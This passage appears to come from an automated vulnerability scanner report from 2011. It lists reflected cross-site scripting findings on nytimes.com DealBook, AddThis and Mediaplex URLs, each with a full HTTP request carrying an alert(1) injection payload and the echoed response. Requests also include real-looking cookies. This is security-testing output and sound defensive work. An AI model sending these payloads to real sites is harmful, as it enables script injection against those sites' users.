Cookie: RMID=27fdc70e4ff84dbef4b4b43a; news_people_toolbar=NO; nyt-recmod=1; nyt-nofb=0; __utmz=69104142.1305112069.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=69104142.1451073784.1305112061.1305112061.1305112061.1; UserPersNYTRS=RecentLastSearch=/sales/new-york-ny-usa/1000000-99000000-price&RecentSearch=For+Sale_New+York_NY_%241%2c000%2c000-%2499%2c000%2c000%5e%2fsales%2fnew-york-ny-usa%2f1000000-99000000-price; NYTMapState=MapState=map_default; nyt-m=D30DFD30595EF4324E4B50EE62114094&e=i.1306900800&t=i.20&v=i.1&l=l.15.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.2&g=i.0&er=i.1304360120&vr=l.4.1.0.0.0&pr=l.4.10.0.0.0&vp=i.0&gf=l.20.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1; __utmz=30321962.1305198204.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WT_FPC=id=173.193.214.243-4039295808.30148852:lv=1305198204263:ss=1305198204263; rsi_segs=D08734_70008|D08734_70010|D08734_70118|D08734_70613|D08734_72078|H07707_11017|H07707_11018|H07707_11028|H07707_11029|H07707_11030|H07707_11031|H07707_11044|H07707_11048|H07707_10638; __utma=30321962.1644030145.1305198192.1305198192.1305198192.1; __utmc=30321962; __utmb=30321962.2.10.1305198192; _chartbeat2=gi367p67ehp7835r; adxcl=t*26edd=4e32303f:1305112022; adxcs=si=0:1|s*23645=0:1|s*1935f=0:1|s*18a4b=0:1

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:16:10 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://dealbook.nytimes.com/xmlrpc.php
Cneonction: close
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Content-Length: 80654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/dealbook/category/main-topicse7f31\"><script>alert(1)</script>d4e86dd7255/mergers-acquisitions&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle
...[SNIP]...

4.100. http://dealbook.nytimes.com/category/main-topics/private-equity/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dealbook.nytimes.com
Path:   /category/main-topics/private-equity/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f84c"><script>alert(1)</script>e1de8e2eba6 was submitted in the REST URL parameter 2. This input was echoed as 5f84c\"><script>alert(1)</script>e1de8e2eba6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/main-topics5f84c"><script>alert(1)</script>e1de8e2eba6/private-equity/ HTTP/1.1
Host: dealbook.nytimes.com
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RMID=27fdc70e4ff84dbef4b4b43a; news_people_toolbar=NO; nyt-recmod=1; nyt-nofb=0; __utmz=69104142.1305112069.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=69104142.1451073784.1305112061.1305112061.1305112061.1; UserPersNYTRS=RecentLastSearch=/sales/new-york-ny-usa/1000000-99000000-price&RecentSearch=For+Sale_New+York_NY_%241%2c000%2c000-%2499%2c000%2c000%5e%2fsales%2fnew-york-ny-usa%2f1000000-99000000-price; NYTMapState=MapState=map_default; __utmz=30321962.1305198204.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=30321962.1644030145.1305198192.1305198192.1305198192.1; __utmc=30321962; __utmb=30321962.6.10.1305198192; adxcl=l*247c7=4f24d24f:1|t*26edd=4e32303f:1305112022; adxcs=si=0:1|s*23645=0:1|s*1935f=0:1|s*18a4b=0:1|s*1780a=0:1|s*2554b=0:1; nyt-m=A61A961B774C8275E676733D3F0E8B0E&e=i.1306900800&t=i.20&v=i.1&l=l.15.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.2&g=i.0&er=i.1304360120&vr=l.4.1.0.0.0&pr=l.4.12.0.0.0&vp=i.0&gf=l.20.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1; rsi_segs=D08734_70008|D08734_70010|D08734_70118|D08734_70613|D08734_72078|H07707_11017|H07707_11018|H07707_11028|H07707_11029|H07707_11030|H07707_11031|H07707_11044|H07707_11048|H07707_10638; _chartbeat2=gi367p67ehp7835r; WT_FPC=id=173.193.214.243-4039295808.30148852:lv=1305200199902:ss=1305198204263

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:37:07 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://dealbook.nytimes.com/xmlrpc.php
Cneonction: close
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Content-Length: 80055

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/dealbook/category/main-topics5f84c\"><script>alert(1)</script>e1de8e2eba6/private-equity&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left
...[SNIP]...

4.101. http://dealbook.nytimes.com/category/main-topics/venture-capital/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dealbook.nytimes.com
Path:   /category/main-topics/venture-capital/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dbe83"><script>alert(1)</script>aec22f4a558 was submitted in the REST URL parameter 2. This input was echoed as dbe83\"><script>alert(1)</script>aec22f4a558 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/main-topicsdbe83"><script>alert(1)</script>aec22f4a558/venture-capital/ HTTP/1.1
Host: dealbook.nytimes.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/12/takeda-in-talks-to-buy-nycomed-for-up-to-14-billion/
Cookie: RMID=0f2ce1bc50c84dca6d901646; nyt-m=FADD01C96E4F27CAA76E2D598CDA52BE&e=i.1306900800&t=i.20&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.2&g=i.0&er=i.1305111957&vr=l.4.0.0.0.0&pr=l.4.16.0.0.0&vp=i.0&gf=l.20.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1; nyt-recmod=1; nyt-nofb=0; WT_FPC=id=173.193.214.243-1926640512.30150603:lv=1305199637269:ss=1305199567634; rsi_segs=D08734_70010|D08734_70105|H07707_11028|H07707_11029|H07707_11044|H07707_11048; news_people_toolbar=NO; __utma=30321962.1192182855.1305199567.1305199567.1305199567.1; __utmb=30321962.4.10.1305199567; __utmc=30321962; __utmz=30321962.1305199567.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/0; _chartbeat2=qu8esf0gap8ovzzw; adxcs=s*192f7=0:1

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:27:52 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://dealbook.nytimes.com/xmlrpc.php
Cneonction: close
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Content-Length: 80586

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/dealbook/category/main-topicsdbe83\"><script>alert(1)</script>aec22f4a558/venture-capital&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Lef
...[SNIP]...

4.102. http://ds.addthis.com/red/psi/sites/www.csscorp.com/p.json [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.csscorp.com/p.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload f3a5c<script>alert(1)</script>fa005dc8a42 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /red/psi/sites/www.csscorp.com/p.json?callback=_ate.ad.hprf3a5c<script>alert(1)</script>fa005dc8a42&uid=4dc048d9159e4ae3&url=http%3A%2F%2Fwww.csscorp.com%2F&ffv352 HTTP/1.1
Host: ds.addthis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh42.html
Cookie: uid=4dc048d9159e4ae3; psc=4; loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; dt=X; di=%7B%7D..1305200976.1FE|1305201657.1OD|1305200976.60; uit=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 131
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Thu, 12 May 2011 12:10:14 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Sat, 11 Jun 2011 12:10:14 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Thu, 12 May 2011 12:10:14 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 12 May 2011 12:10:14 GMT
Connection: close

_ate.ad.hprf3a5c<script>alert(1)</script>fa005dc8a42({"urls":[],"segments" : [],"loc": "MjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg=="})

4.103. http://ds.addthis.com/red/psi/sites/www.elawmarketing.com/p.json [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.elawmarketing.com/p.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload dd5d7<script>alert(1)</script>da1a969282b was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /red/psi/sites/www.elawmarketing.com/p.json?callback=_ate.ad.hprdd5d7<script>alert(1)</script>da1a969282b&uid=4dc048d9159e4ae3&url=http%3A%2F%2Fwww.elawmarketing.com%2Fabout%2Fclients&ref=http%3A%2F%2Fwww.elawmarketing.com%2F&149tj8h HTTP/1.1
Host: ds.addthis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh42.html
Cookie: uid=4dc048d9159e4ae3; psc=4; loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; dt=X; di=%7B%7D..1305200976.1FE|1305200976.60; uit=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 227
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Thu, 12 May 2011 12:00:58 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Sat, 11 Jun 2011 12:00:58 GMT; Path=/
Set-Cookie: di=%7B%7D..1305200976.1FE|1305201658.1OD|1305200976.60; Domain=.addthis.com; Expires=Sat, 11-May-2013 12:00:57 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Thu, 12 May 2011 12:00:58 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 12 May 2011 12:00:58 GMT
Connection: close

_ate.ad.hprdd5d7<script>alert(1)</script>da1a969282b({"urls":["http://xcdn.xgraph.net/15530/db/xg.gif?pid=15530&sid=10001&type=db&p_bid=4dc048d9159e4ae3"],"segments" : ["1OD"],"loc": "MjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg=="})

4.104. http://ds.addthis.com/red/psi/sites/www.pomerantzlaw.com/p.json [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.pomerantzlaw.com/p.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 7f299<script>alert(1)</script>34209919e93 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /red/psi/sites/www.pomerantzlaw.com/p.json?callback=_ate.ad.hpr7f299<script>alert(1)</script>34209919e93&uid=4dc048d9159e4ae3&url=http%3A%2F%2Fwww.pomerantzlaw.com%2Fattorneys.html&ref=http%3A%2F%2Fwww.pomerantzlaw.com%2Fcontact-us.html&1mrdgam HTTP/1.1
Host: ds.addthis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh42.html
Cookie: uid=4dc048d9159e4ae3; psc=4; loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; dt=X; di=1304431085.60|1304431085.1OD|1304431085.1FE; uit=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 457
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Thu, 12 May 2011 11:49:37 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Sat, 11 Jun 2011 11:49:37 GMT; Path=/
Set-Cookie: di=%7B%7D..1305200977.1FE|1305200977.1OD|1305200977.60; Domain=.addthis.com; Expires=Sat, 11-May-2013 11:49:36 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Thu, 12 May 2011 11:49:37 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 12 May 2011 11:49:37 GMT
Connection: close

_ate.ad.hpr7f299<script>alert(1)</script>34209919e93({"urls":["http://pixel.33across.com/ps/?pid=454&uid=4dc048d9159e4ae3","http://xcdn.xgraph.net/15530/db/xg.gif?pid=15530&sid=10001&type=db&p_bid=4dc048d9159e4ae3","http://cspix.media6degrees.com/orbser
...[SNIP]...

4.105. http://img.mediaplex.com/content/0/15917/119013/OD_Promises_Domestic_300x250.js [mpck parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/15917/119013/OD_Promises_Domestic_300x250.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f3f80'%3balert(1)//cf614ca88fe was submitted in the mpck parameter. This input was echoed as f3f80';alert(1)//cf614ca88fe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/15917/119013/OD_Promises_Domestic_300x250.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F15917-119013-26745-9%3Fmpt%3D4107592f3f80'%3balert(1)//cf614ca88fe&mpjs=core.insightexpressai.com%2FadServer%2FadServerESI.aspx%3FbannerID%3D175237%26siteID%3D15917119013267459%26creativeID%3D7164347&mpt=4107592&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b05/3/0/%2a/x%3B240687484%3B0-0%3B0%3B22018236%3B4307-300/250%3B41199286/41217073/1%3Bu%3D10428|||||article|frame1|recession|henry-kravis|rjr-nabisco|junk-bonds|padma-lakshmi|||||||||||||||||||||%3B%7Eokv%3D%3Bcomp%3D%3Bs1%3Dmarkets%3Bs2%3D%3Bpos%3Dframe1%3Bctype%3Dfront%3Bptype%3Darticle%3Burl%3Dmarkets_2011_05_03_legendary-deal-maker-ted-forstmann-treated-brain-cancer_%3Bm1%3Drecession%3Bm2%3Dhenry-kravis%3Bm3%3Drjr-nabisco%3Bm4%3Djunk-bonds%3Bm5%3Dpadma-lakshmi%3Brs%3D10428%3Bqc%3DD%3Bqc%3DT%3Bqc%3D3995%3Bqc%3D921%3Bqc%3D922%3Bqc%3D928%3Bqc%3D929%3Bqc%3D3994%3Bsz%3D300x250%2C336x280%3Btile%3D2%3Bu%3D10428|||||article|frame1|recession|henry-kravis|rjr-nabisco|junk-bonds|padma-lakshmi|||||||||||||||||||||%3B%21c%3D%3B%7Eaopt%3D2/1/9e/0%3B%7Esscs%3D%3f HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=15917:26745/13198:5934/13305:22136/17263:25710/17113:25710/16186:22724/15368:22624/16228:16454/10105:1629/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:40:01 GMT
Server: Apache
Last-Modified: Mon, 21 Mar 2011 18:13:03 GMT
ETag: "429679-e60-49f02141c69c0"
Accept-Ranges: bytes
Content-Length: 6890
Content-Type: application/x-javascript


(function(){
var protocol = window.location.protocol;
if (protocol == "https:") {
protocol = "https://secure.img-cdn.mediaplex.com/0/";
}
else
{
protocol = "http://img-cdn.mediaplex.com/0/";
};
...[SNIP]...
u=10428|||||article|frame1|recession|henry-kravis|rjr-nabisco|junk-bonds|padma-lakshmi|||||||||||||||||||||;!c=;~aopt=2/1/9e/0;~sscs=?http://altfarm.mediaplex.com/ad/ck/15917-119013-26745-9?mpt=4107592f3f80';alert(1)//cf614ca88fe" target="_blank">
...[SNIP]...

4.106. http://img.mediaplex.com/content/0/15917/119013/OD_Promises_Domestic_300x250.js [mpck parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/15917/119013/OD_Promises_Domestic_300x250.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 174b2"-alert(1)-"3864f9a6960 was submitted in the mpck parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/15917/119013/OD_Promises_Domestic_300x250.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F15917-119013-26745-9%3Fmpt%3D4107592174b2"-alert(1)-"3864f9a6960&mpjs=core.insightexpressai.com%2FadServer%2FadServerESI.aspx%3FbannerID%3D175237%26siteID%3D15917119013267459%26creativeID%3D7164347&mpt=4107592&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b05/3/0/%2a/x%3B240687484%3B0-0%3B0%3B22018236%3B4307-300/250%3B41199286/41217073/1%3Bu%3D10428|||||article|frame1|recession|henry-kravis|rjr-nabisco|junk-bonds|padma-lakshmi|||||||||||||||||||||%3B%7Eokv%3D%3Bcomp%3D%3Bs1%3Dmarkets%3Bs2%3D%3Bpos%3Dframe1%3Bctype%3Dfront%3Bptype%3Darticle%3Burl%3Dmarkets_2011_05_03_legendary-deal-maker-ted-forstmann-treated-brain-cancer_%3Bm1%3Drecession%3Bm2%3Dhenry-kravis%3Bm3%3Drjr-nabisco%3Bm4%3Djunk-bonds%3Bm5%3Dpadma-lakshmi%3Brs%3D10428%3Bqc%3DD%3Bqc%3DT%3Bqc%3D3995%3Bqc%3D921%3Bqc%3D922%3Bqc%3D928%3Bqc%3D929%3Bqc%3D3994%3Bsz%3D300x250%2C336x280%3Btile%3D2%3Bu%3D10428|||||article|frame1|recession|henry-kravis|rjr-nabisco|junk-bonds|padma-lakshmi|||||||||||||||||||||%3B%21c%3D%3B%7Eaopt%3D2/1/9e/0%3B%7Esscs%3D%3f HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=15917:26745/13198:5934/13305:22136/17263:25710/17113:25710/16186:22724/15368:22624/16228:16454/10105:1629/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:39:59 GMT
Server: Apache
Last-Modified: Mon, 21 Mar 2011 18:13:03 GMT
ETag: "429679-e60-49f02141c69c0"
Accept-Ranges: bytes
Content-Length: 6884
Content-Type: application/x-javascript


(function(){
var protocol = window.location.protocol;
if (protocol == "https:") {
protocol = "https://secure.img-cdn.mediaplex.com/0/";
}
else
{
protocol = "http://img-cdn.mediaplex.com/0/";
};
...[SNIP]...
<mpcke/>';
if (mpcke == 1) {
mpcclick = encodeURIComponent("altfarm.mediaplex.com%2Fad%2Fck%2F15917-119013-26745-9%3Fmpt%3D4107592174b2"-alert(1)-"3864f9a6960");
mpck = "http://" + mpcclick;
}
else if (mpcke == 2) {
mpcclick2 = encodeURIComponent("altfarm.mediaplex.com%2Fad%2Fck%2F15917-119013-26745-9%3Fmpt%3D4107592174b2"-alert(1)-"3864f9a6960");
mpck = "h
...[SNIP]...

4.107. http://img.mediaplex.com/content/0/15917/119013/OD_Promises_Domestic_300x250.js [mpjs parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/15917/119013/OD_Promises_Domestic_300x250.js

Issue detail

The value of the mpjs request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5874a"%3balert(1)//f4e52b4d717 was submitted in the mpjs parameter. This input was echoed as 5874a";alert(1)//f4e52b4d717 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/15917/119013/OD_Promises_Domestic_300x250.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F15917-119013-26745-9%3Fmpt%3D4107592&mpjs=core.insightexpressai.com%2FadServer%2FadServerESI.aspx%3FbannerID%3D175237%26siteID%3D15917119013267459%26creativeID%3D71643475874a"%3balert(1)//f4e52b4d717&mpt=4107592&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b05/3/0/%2a/x%3B240687484%3B0-0%3B0%3B22018236%3B4307-300/250%3B41199286/41217073/1%3Bu%3D10428|||||article|frame1|recession|henry-kravis|rjr-nabisco|junk-bonds|padma-lakshmi|||||||||||||||||||||%3B%7Eokv%3D%3Bcomp%3D%3Bs1%3Dmarkets%3Bs2%3D%3Bpos%3Dframe1%3Bctype%3Dfront%3Bptype%3Darticle%3Burl%3Dmarkets_2011_05_03_legendary-deal-maker-ted-forstmann-treated-brain-cancer_%3Bm1%3Drecession%3Bm2%3Dhenry-kravis%3Bm3%3Drjr-nabisco%3Bm4%3Djunk-bonds%3Bm5%3Dpadma-lakshmi%3Brs%3D10428%3Bqc%3DD%3Bqc%3DT%3Bqc%3D3995%3Bqc%3D921%3Bqc%3D922%3Bqc%3D928%3Bqc%3D929%3Bqc%3D3994%3Bsz%3D300x250%2C336x280%3Btile%3D2%3Bu%3D10428|||||article|frame1|recession|henry-kravis|rjr-nabisco|junk-bonds|padma-lakshmi|||||||||||||||||||||%3B%21c%3D%3B%7Eaopt%3D2/1/9e/0%3B%7Esscs%3D%3f HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=15917:26745/13198:5934/13305:22136/17263:25710/17113:25710/16186:22724/15368:22624/16228:16454/10105:1629/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:40:07 GMT
Server: Apache
Last-Modified: Mon, 21 Mar 2011 18:13:03 GMT
ETag: "429679-e60-49f02141c69c0"
Accept-Ranges: bytes
Content-Length: 6800
Content-Type: application/x-javascript


(function(){
var protocol = window.location.protocol;
if (protocol == "https:") {
protocol = "https://secure.img-cdn.mediaplex.com/0/";
}
else
{
protocol = "http://img-cdn.mediaplex.com/0/";
};
...[SNIP]...
<script type=\"text/javascript\" src=\"http://core.insightexpressai.com/adServer/adServerESI.aspx?bannerID=175237&siteID=15917119013267459&creativeID=71643475874a";alert(1)//f4e52b4d717\">
...[SNIP]...

4.108. http://img.mediaplex.com/content/0/15917/119013/OD_Promises_Domestic_300x250.js [mpvc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/15917/119013/OD_Promises_Domestic_300x250.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 54bb8'%3balert(1)//3d79a42824 was submitted in the mpvc parameter. This input was echoed as 54bb8';alert(1)//3d79a42824 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

